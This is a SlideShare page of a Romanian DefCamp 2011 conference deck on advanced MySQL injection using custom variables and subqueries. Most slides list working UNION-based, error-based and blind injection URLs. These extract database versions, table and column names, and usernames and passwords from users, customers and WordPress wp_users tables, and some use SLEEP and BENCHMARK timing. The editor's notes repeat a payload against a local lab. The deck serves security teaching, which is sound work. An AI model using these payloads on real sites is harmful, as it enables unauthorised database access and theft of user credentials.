Advanced data mining in my sql injections using subqueries and custom variables
Download as PPTX, PDF4 likes5,002 views
This document discusses advanced MySQL injection techniques using custom variables and subqueries. It provides examples of different types of SQL injections like UNION-based, error-based, and blind injections. It also explains how to use MySQL custom variables and subqueries to optimize data extraction from the database in SQL injection attacks. The techniques allow retrieving database names, table names, column names, user privileges and reading/writing files on the server.
![Advanced Data Mining in MySQL Injections using Subqueries & Custom Variables_______________________________________________________________________- CUPRINS -[ * ] Notiuni introductive: SQL , Injectii SQL[ * ] Variabile Particularizate si Sub-Interogari in MySQL[ * ] Optimizarea tehnicilor clasice de extragere a informatiilor : - variabile MySQL ( Server System Variables / Session Variables ) - bazele de date disponibile ( schema_name / SCHEMATA ) - tabelele si coloanele aferente acestora ( table_name / column_name ) - privilegii ( USER_PRIVILEGES : GRANTEE/PRIVILEGE_TYPE/IS_GRANTABLE ) - citirea & scrierea fisierelor ( LOAD_FILE / INTO DUMPFILE - OUTFILE)- atacuri Denial of Service ( DOS )](https://image.slidesharecdn.com/advanceddatamininginmysqlinjectionsusingsubqueriesandcustomvariables-111005125530-phpapp02/85/Advanced-data-mining-in-my-sql-injections-using-subqueries-and-custom-variables-2-320.jpg)
Advanced data mining in my sql injections using subqueries and custom variables
- 1. DEFCAMP – 2011“Advanced Data Mining in MySQL Injections using Subqueries & Custom Variables”
- 2. Advanced Data Mining in MySQL Injections using Subqueries & Custom Variables_______________________________________________________________________- CUPRINS -[ * ] Notiuni introductive: SQL , Injectii SQL[ * ] Variabile Particularizate si Sub-Interogari in MySQL[ * ] Optimizarea tehnicilor clasice de extragere a informatiilor : - variabile MySQL ( Server System Variables / Session Variables ) - bazele de date disponibile ( schema_name / SCHEMATA ) - tabelele si coloanele aferente acestora ( table_name / column_name ) - privilegii ( USER_PRIVILEGES : GRANTEE/PRIVILEGE_TYPE/IS_GRANTABLE ) - citirea & scrierea fisierelor ( LOAD_FILE / INTO DUMPFILE - OUTFILE)- atacuri Denial of Service ( DOS )
- 3. Advanced Data Mining in MySQL Injections using Subqueries & Custom Variables_______________________________________________________________________Structured Query Language (SQL - limbajul structurat de interogare) este limbajul standard folosit pentru manipularea si regasirea datelor din baze de date relationale. Prin SQL, un programator sau un administrator de baze de date poate face urmatoarele lucruri:* sa modifice structura unei baze de date ; * sa schimbe valorile de configurare pentru securitatea sistemului; * sa adauge drepturi utilizatorilor asupra bazelor de date sau tabelelor; * sa interogheze o baza de date asupra unor informatii; * sa actualizeze continutul unei baze de date.
- 4. Advanced Data Mining in MySQL Injections using Subqueries & Custom Variables_______________________________________________________________________Cum functioneaza PHP + MySQL ? < request-ul efectuat de catre client< procesarea request-ului la nivel de server< raspunsul trimis catre client ca rezultat al cererii
- 5. Advanced Data Mining in MySQL Injections using Subqueries & Custom Variables_______________________________________________________________________ What could possibly go wrong ?!!!!!!
- 6. Advanced Data Mining in MySQL Injections using Subqueries & Custom Variables_______________________________________________________________________SQL Injections ( Injectii SQL ) – tehnica de malformare a sintaxei SQL datorata modificarii valorilor parametrilor $_GET, $_POST, cookies, headers, ce sunt preluate si prelucrate de fisierele server-side fara a filtra in prealabil caractere sau comenzi ce pot fi periculoase.
- 7. Advanced Data Mining in MySQL Injections using Subqueries & Custom Variables_______________________________________________________________________Exemplu de injectie MySQL clasica.
- 8. Advanced Data Mining in MySQL Injections using Subqueries & Custom Variables_______________________________________________________________________Tipuri de injectii SQL : UNION BASEDindex.php?id=1’ and 2=4 UNION SELECT 1,2,3,4,5,6,7,8,9,10 --index.php?poze=vedete"+and+false+union+all+select+1,2,version(),4,5,6+and+"1"="1index.php?id=-1+UNION+SELECT+1,convert(@@version using latin1),3,4,5--index.php? id=-1/*!AND*/1=1+UNiOn+ALl+SelECt+1,/**/2,/**/3,/**/4/**/limit/**/1,2index.php?id=1+and+1=0+union+select+ sql_no_cache+1,2,3,4,5
- 9. Advanced Data Mining in MySQL Injections using Subqueries & Custom Variables_______________________________________________________________________Tipuri de injectii SQL : UNION BASED
- 10. Advanced Data Mining in MySQL Injections using Subqueries & Custom Variables_______________________________________________________________________Tipuri de injectii SQL : ERROR BASEDindex.php?id=(@:=1)||@+group+by+concat(@@version,!@)having@||min(@:=0)--+Index.php?id=53+OR+(SELECT+COUNT(*)+FROM+(SELECT+1+UNION+SELECT+2+UNION+SELECT+3)x+GROUP+BY+CONCAT(MID((select+concat_ws(0x3a,version(),database(),user())),1,63),+FLOOR(RAND(0)*2)))+--+news.php?id=589'+or+1+group+by+concat((select+version()),floor(rand(0)*2))+having+min(0)+or+1-- +details.php?ID=9 or (select count(*) from mysql.user group by concat(version(),floor(rand(0)*2)))--?productid=1124+and+row(1,2)in(select+count(*),concat((select+table_name+from+information_schema.tables+limit+3,1),0x3a,floor(rand(0)*2))as+a+from+information_schema.tables+x+group+by+a)--
- 11. Advanced Data Mining in MySQL Injections using Subqueries & Custom Variables_______________________________________________________________________Tipuri de injectii SQL : ERROR BASED
- 12. Advanced Data Mining in MySQL Injections using Subqueries & Custom Variables_______________________________________________________________________Tipuri de injectii SQL : BLINDindex.php?id=1’ and substring(@@version,1,1)=4--index.php?id=1’ and substring(@@version,1,1)=5--index.php?id=1 and (SELECT 1 from admin limit 0,1)=1news.php?id = -1 'OR id = IF(ASCII(SUBSTRING (SELECT USER ()), 1, 1 )))>= 100, 1, SLEEP (3)) index.html?mdl=5020+and+ascii(lower(substring((select+table_name+from+information_schema.tables+limit+17,1),1,1 )))>1index.php?id=1 and ascii(substring((SELECT concat(username,0x3a,password) from users where userid=2),1,1))>103script.php?par=1 and IF(ASCII(SUBSTRING((SELECT USER()),1,1)))>=100,1, BENCHMARK(2000000,MD5(NOW()))) –script.php?par=1 and IF(ASCII(SUBSTRING((SELECT USER()), 1, 1)))>=100, 1, SLEEP(3)) --
- 13. Advanced Data Mining in MySQL Injections using Subqueries & Custom Variables_______________________________________________________________________Tipuri de injectii SQL : BLIND
- 14. Advanced Data Mining in MySQL Injections using Subqueries & Custom Variables_______________________________________________________________________MySQL Custom Variables (Variabile Particularizate)
- 15. Advanced Data Mining in MySQL Injections using Subqueries & Custom Variables_______________________________________________________________________MySQL Sub-Queries (Sub-Interogari)SELECT * FROM t1 WHERE column1 = (SELECT column1 FROM t2);
- 16. Advanced Data Mining in MySQL Injections using Subqueries & Custom Variables_______________________________________________________________________Injectii MySQL - folosind Custom Variables :CLASIC SYNTAX : index.php?id=2’+and+1=0+union+select+1,2,3,4,5--NEW SYNTAX: index.php?id=2’+and+1=0+union+select+@i:=version(),@i,@i,@i,@i--@i:=concat( version(),0x3a,database() )@i:=cast(version()+as+binary)@i:=convert(version(),binary)@i:=convert(version()+using+latin1)@i:=aes_decrypt(aes_encrypt(version(),1),1)@x:=concat(0x3c62723e,table_schema,0x2e,table_name,0x3a,column_name)
- 17. Advanced Data Mining in MySQL Injections using Subqueries & Custom Variables_______________________________________________________________________Injectii MySQL - folosind SubQueries :index.php?id = -1+union+select+*+from+users,(select+1,2,3,4,5,6)a--index.php?id=-1+union+(select 1,2,3,4,5 order by 1 where 1=2) UNION (select1,2,3,4,5)--+--Xid=3 AND (SELECT 7574 FROM(SELECT COUNT(*) ,CONCAT(CHAR(58,103,104,115,58),(SELECT (CASE WHEN (7574=7574) THEN 1 ELSE 0 END)), CHAR(58,101,118,118,58), FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)
- 18. Advanced Data Mining in MySQL Injections using Subqueries & Custom Variables_______________________________________________________________________Injectii MySQL - folosind SubQueries + Custom Variables :index.php?id=-4 union select 1,2,(select(@x) from(select(@x:=0x00) , (select (null) from (information_schema.columns) where (table_schema!=‘information_schema’) and (0x00) in (@x:=concat(@x,0x3c62723e,table_schema,0x2e,table_name,0x3a,column_name))))x),4--index.php?id=-1 Union select 1,2, concat(@i:=0x00,@o:=0x0d0a, benchmark(150, @o:=CONCAT(@o,0x0d0a,(SELECT+concat(@i:=mail,0x3a,password)+from+customers+WHERE+mail > @i+order+by+mail+LIMIT+1+))),o),4 index.php?id=-7’ union (select * from (select @i:=version())q join (select@i)w join (select@i)e join (select @i)r join (select @i)t join (select @i)y join (select @i)u join (select @i)i join (select @i)o)--+--qwertyxxxxxxxx
- 19. Advanced Data Mining in MySQL Injections using Subqueries & Custom Variables_______________________________________________________________________Injectii MySQL - folosind SubQueries + Custom Variables :index.php?id=2'+and+1=0+union+select+1,2,3,4,concat(@i:=0x00,@o:=0xd0a,benchmark(1010370,@o:=CONCAT(@o,0xd0a,(SELECT+concat(0x3c62723e,@i:=user_login)+FROM+wp_users+WHERE+user_login>@i+order+by+user_login+LIMIT+1))),@o),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23+from+information_schema.tables--
- 20. ………
Editor's Notes
- #20: 127.0.0.1/defcamp/0_o/index.php?id=2'+and+1=0+union+select+1,2,3,4,concat(@i:=0x00,@o:=0xd0a,benchmark(1010370,@o:=CONCAT(@o,0xd0a,(SELECT+concat(0x3c62723e,@i:=user_login)+FROM+wp_users+WHERE+user_login>@i+order+by+user_login+LIMIT+1))),@o),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23+from+information_schema.tables--
- #21: 127.0.0.1/defcamp/0_o/index.php?id=2'+and+1=0+union+select+1,2,3,4,concat(@i:=0x00,@o:=0xd0a,benchmark(1010370,@o:=CONCAT(@o,0xd0a,(SELECT+concat(0x3c62723e,@i:=user_login)+FROM+wp_users+WHERE+user_login>@i+order+by+user_login+LIMIT+1))),@o),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23+from+information_schema.tables--